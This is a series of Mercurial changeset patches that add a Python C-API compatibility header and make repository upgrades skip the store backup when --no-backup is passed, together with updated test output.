inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = 
tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. 
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/mercurial/cext/osutil.c b/mercurial/cext/osutil.c --- a/mercurial/cext/osutil.c +++ b/mercurial/cext/osutil.c @@ -119,7 +119,7 @@ static void listdir_stat_dealloc(PyObject *o) { - o->ob_type->tp_free(o); + Py_TYPE(o)->tp_free(o); } static PyObject *listdir_stat_getitem(PyObject *self, PyObject *key) diff --git a/mercurial/cext/pathencode.c b/mercurial/cext/pathencode.c --- a/mercurial/cext/pathencode.c +++ b/mercurial/cext/pathencode.c @@ -21,6 +21,7 @@ #include <ctype.h> #include <stdlib.h> #include <string.h> +#include "pythoncapi_compat.h" #include "util.h" @@ -678,7 +679,7 @@ } assert(PyBytes_Check(ret)); - Py_SIZE(ret) = destlen; + Py_SET_SIZE(ret, destlen); return ret; } diff --git a/mercurial/pythoncapi_compat.h b/mercurial/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/mercurial/pythoncapi_compat.h @@ -0,0 +1,278 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +// Cast argument to PyObject* type. 
+#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 
added PyFrame_GetBack() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyThreadState_GetID() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to 
Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. 
+#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -11,6 +11,7 @@ > -X contrib/python-zstandard \ > -X hgext/fsmonitor/pywatchman \ > -X mercurial/thirdparty \ + > -X mercurial/pythoncapi_compat.h \ > | sed 's-\\-/-g' | "$check_code" --warnings --per-file=0 - || false Skipping contrib/automation/hgautomation/__init__.py it has no-che?k-code (glob) Skipping contrib/automation/hgautomation/aws.py it has no-che?k-code (glob) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610621740 -19800 # Thu Jan 14 16:25:40 2021 +0530 # Node ID 2e8a844d0ae011806c16211e81eb4ad1e6969a6e # Parent e92ca942ddca2b10cd9ae1321dd0193203ca4d25 upgrade: don't create store backup if `--no-backup` is passed If the user explicitly mentioned that they don't need backup, then let's not create it. 
Differential Revision: https://phab.mercurial-scm.org/D9770 diff --git a/mercurial/upgrade.py b/mercurial/upgrade.py --- a/mercurial/upgrade.py +++ b/mercurial/upgrade.py @@ -118,6 +118,7 @@ up_actions, removed_actions, revlogs, + backup, ) if not run: @@ -215,12 +216,6 @@ backuppath = upgrade_engine.upgrade( ui, repo, dstrepo, upgrade_op ) - if not backup: - ui.status( - _(b'removing old repository content %s\n') % backuppath - ) - repo.vfs.rmtree(backuppath, forcibly=True) - backuppath = None finally: ui.status(_(b'removing temporary repository %s\n') % tmppath) diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -626,6 +626,7 @@ upgrade_actions, removed_actions, revlogs_to_process, + backup_store, ): self.ui = ui self.new_requirements = new_requirements @@ -670,6 +671,9 @@ b're-delta-multibase' in self._upgrade_actions_names ) + # should this operation create a backup of the store + self.backup_store = backup_store + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -412,7 +412,10 @@ """ # TODO: don't blindly rename everything in store # There can be upgrades where store is not touched at all - util.rename(currentrepo.spath, backupvfs.join(b'store')) + if upgrade_op.backup_store: + util.rename(currentrepo.spath, backupvfs.join(b'store')) + else: + currentrepo.vfs.rmtree(b'store', forcibly=True) util.rename(upgradedrepo.spath, currentrepo.spath) @@ -436,6 +439,8 @@ """ assert srcrepo.currentwlock() assert dstrepo.currentwlock() + backuppath = None + backupvfs = None ui.status( _( @@ -464,11 +469,16 @@ ui.status(_(b'data fully upgraded in a temporary repository\n')) - backuppath = pycompat.mkdtemp(prefix=b'upgradebackup.', 
dir=srcrepo.path) - backupvfs = vfsmod.vfs(backuppath) + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile(srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires')) + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) # We install an arbitrary requirement that clients must not support # as a mechanism to lock out new clients during the data swap. This is @@ -485,7 +495,8 @@ ) ui.status(_(b'starting in-place swap of repository data\n')) - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) + if upgrade_op.backup_store: + ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) # Now swap in the new store directory. Doing it as a rename should make # the operation nearly instantaneous and atomic (at least in well-behaved @@ -512,10 +523,11 @@ ) scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. 
+ backupvfs.unlink(b'store/lock') return backuppath diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -632,11 +632,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for * (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ ls -1 .hg/ | grep upgradebackup [1] @@ -679,11 +677,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) Check that the repo still works fine @@ -759,11 +755,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... 
store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -810,11 +804,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -861,11 +853,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -919,11 +909,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... 
store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets @@ -978,11 +966,9 @@ data fully upgraded in a temporary repository marking source repository as being upgraded; clients will be unable to read from repository starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) replacing store... store replacement complete; repository was inconsistent for *s (glob) finalizing requirements file and making repository readable again - removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob) removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob) $ hg verify checking changesets # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1607943000 -19800 # Mon Dec 14 16:20:00 2020 +0530 # Node ID a83e1496d943ecaedfcb1614399eb47292ee4803 # Parent 2e8a844d0ae011806c16211e81eb4ad1e6969a6e actions: calculate what all parts does the operation touches To make upgrade work less in certain situations, we need to teach it to find out what all parts of repository current operation is touching. This patch starts doing that. In next patch we will be setting values in improvement objects. For now, we assume everything touches everything. 
Differential Revision: https://phab.mercurial-scm.org/D9771 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -66,6 +66,18 @@ postdowngrademessage Message intended for humans which will be shown post an upgrade operation in which this improvement was removed + + touches_filelogs (bool) + Whether this improvement touches filelogs + + touches_manifests (bool) + Whether this improvement touches manifests + + touches_changelog (bool) + Whether this improvement touches changelog + + touches_requirements (bool) + Whether this improvement changes repository requirements """ def __init__(self, name, type, description, upgrademessage): @@ -75,6 +87,12 @@ self.upgrademessage = upgrademessage self.postupgrademessage = None self.postdowngrademessage = None + # By default for now, we assume every improvement touches + # all the things + self.touches_filelogs = True + self.touches_manifests = True + self.touches_changelog = True + self.touches_requirements = True def __eq__(self, other): if not isinstance(other, improvement): @@ -128,6 +146,12 @@ # operation in which this improvement was removed postdowngrademessage = None + # By default for now, we assume every improvement touches all the things + touches_filelogs = True + touches_manifests = True + touches_changelog = True + touches_requirements = True + def __init__(self): raise NotImplementedError() @@ -674,6 +698,72 @@ # should this operation create a backup of the store self.backup_store = backup_store + # whether the operation touches different revlogs at all or not + self.touches_filelogs = self._touches_filelogs() + self.touches_manifests = self._touches_manifests() + self.touches_changelog = self._touches_changelog() + # whether the operation touches requirements file or not + self.touches_requirements = self._touches_requirements() + self.touches_store = ( + self.touches_filelogs + or 
self.touches_manifests + or self.touches_changelog + ) + # does the operation only touches repository requirement + self.requirements_only = ( + self.touches_requirements and not self.touches_store + ) + + def _touches_filelogs(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_filelogs: + return True + for a in self.removed_actions: + if a.touches_filelogs: + return True + return False + + def _touches_manifests(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_manifests: + return True + for a in self.removed_actions: + if a.touches_manifests: + return True + return False + + def _touches_changelog(self): + for a in self.upgrade_actions: + # in optimisations, we re-process the revlogs again + if a.type == OPTIMISATION: + return True + elif a.touches_changelog: + return True + for a in self.removed_actions: + if a.touches_changelog: + return True + return False + + def _touches_requirements(self): + for a in self.upgrade_actions: + # optimisations are used to re-process revlogs and does not result + # in a requirement being added or removed + if a.type == OPTIMISATION: + pass + elif a.touches_requirements: + return True + for a in self.removed_actions: + if a.touches_requirements: + return True + + return False + def _write_labeled(self, l, label): """ Utility function to aid writing of a list under one label # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610623631 -19800 # Thu Jan 14 16:57:11 2021 +0530 # Node ID 60ea95471b83ea0551400c87849c106681598d27 # Parent a83e1496d943ecaedfcb1614399eb47292ee4803 upgrade: mark sharesafe improvement as only touching requirements Upgrading the repository to use share safe functionality only touches requirements. 
Differential Revision: https://phab.mercurial-scm.org/D9772 diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -291,6 +291,12 @@ b' New shares will be created in safe mode.' ) + # upgrade only needs to change the requirements + touches_filelogs = False + touches_manifests = False + touches_changelog = False + touches_requirements = True + @registerformatvariant class sparserevlog(requirementformatvariant): # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610625474 -19800 # Thu Jan 14 17:27:54 2021 +0530 # Node ID 8b02f132adf6ab669237de4d1a29a29433ed09d0 # Parent 60ea95471b83ea0551400c87849c106681598d27 test: unquiet few tests to demonstrate changes in upcoming patches Upcoming patches will skip revlog cloning for share-safe upgrades. Differential Revision: https://phab.mercurial-scm.org/D9773 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -352,18 +352,45 @@ - changelog - manifest - $ hg debugupgraderepo --run -q + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store added: share-safe + share-safe + Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs. + processed revlogs: - all-filelogs - changelog - manifest + beginning upgrade... 
+ repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) + migrating 626 bytes in store; 271 bytes tracked data + migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) + finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes + migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) + finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) + finished migrating 2 changelog revisions; change in size: 0 bytes + finished migrating 6 total revisions; total change in store size: 0 bytes + copying phaseroots + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + replacing store... + store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. 
$ hg debugrequirements @@ -432,7 +459,7 @@ - changelog - manifest - $ hg debugupgraderepo -q --run + $ hg debugupgraderepo --run upgrade will perform the following actions: requirements @@ -444,6 +471,31 @@ - changelog - manifest + beginning upgrade... + repository locked and read-only + creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + (it is safe to interrupt this process any time before data migration completes) + migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) + migrating 626 bytes in store; 271 bytes tracked data + migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) + finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes + migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) + finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes + migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) + finished migrating 2 changelog revisions; change in size: 0 bytes + finished migrating 6 total revisions; total change in store size: 0 bytes + copying phaseroots + copying requires + data fully upgraded in a temporary repository + marking source repository as being upgraded; clients will be unable to read from repository + starting in-place swap of repository data + replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + replacing store... 
+ store replacement complete; repository was inconsistent for *s (glob) + finalizing requirements file and making repository readable again + removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) + copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) + the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. $ hg debugrequirements # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610622298 -19800 # Thu Jan 14 16:34:58 2021 +0530 # Node ID ee9002b9959566290a263493c409fcf7406df2b3 # Parent 8b02f132adf6ab669237de4d1a29a29433ed09d0 engine: add `if True` to prepare for next patch This will help making next patch easier to read. Differential Revision: https://phab.mercurial-scm.org/D9774 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,85 +449,90 @@ ) ) - with dstrepo.transaction(b'upgrade') as tr: - _clonerevlogs( - ui, - srcrepo, - dstrepo, - tr, - upgrade_op, - ) + if True: + with dstrepo.transaction(b'upgrade') as tr: + _clonerevlogs( + ui, + srcrepo, + dstrepo, + tr, + upgrade_op, + ) + + # Now copy other files in the store directory. + for p in _files_to_copy_post_revlog_clone(srcrepo): + srcrepo.ui.status(_(b'copying %s\n') % p) + src = srcrepo.store.rawvfs.join(p) + dst = dstrepo.store.rawvfs.join(p) + util.copyfile(src, dst, copystat=True) + + finishdatamigration(ui, srcrepo, dstrepo, requirements) + + ui.status(_(b'data fully upgraded in a temporary repository\n')) - # Now copy other files in the store directory. 
- for p in _files_to_copy_post_revlog_clone(srcrepo): - srcrepo.ui.status(_(b'copying %s\n') % p) - src = srcrepo.store.rawvfs.join(p) - dst = dstrepo.store.rawvfs.join(p) - util.copyfile(src, dst, copystat=True) + if upgrade_op.backup_store: + backuppath = pycompat.mkdtemp( + prefix=b'upgradebackup.', dir=srcrepo.path + ) + backupvfs = vfsmod.vfs(backuppath) - finishdatamigration(ui, srcrepo, dstrepo, requirements) + # Make a backup of requires file first, as it is the first to be modified. + util.copyfile( + srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + ) - ui.status(_(b'data fully upgraded in a temporary repository\n')) - - if upgrade_op.backup_store: - backuppath = pycompat.mkdtemp( - prefix=b'upgradebackup.', dir=srcrepo.path + # We install an arbitrary requirement that clients must not support + # as a mechanism to lock out new clients during the data swap. This is + # better than allowing a client to continue while the repository is in + # an inconsistent state. + ui.status( + _( + b'marking source repository as being upgraded; clients will be ' + b'unable to read from repository\n' + ) ) - backupvfs = vfsmod.vfs(backuppath) - - # Make a backup of requires file first, as it is the first to be modified. - util.copyfile( - srcrepo.vfs.join(b'requires'), backupvfs.join(b'requires') + scmutil.writereporequirements( + srcrepo, srcrepo.requirements | {b'upgradeinprogress'} ) - # We install an arbitrary requirement that clients must not support - # as a mechanism to lock out new clients during the data swap. This is - # better than allowing a client to continue while the repository is in - # an inconsistent state. 
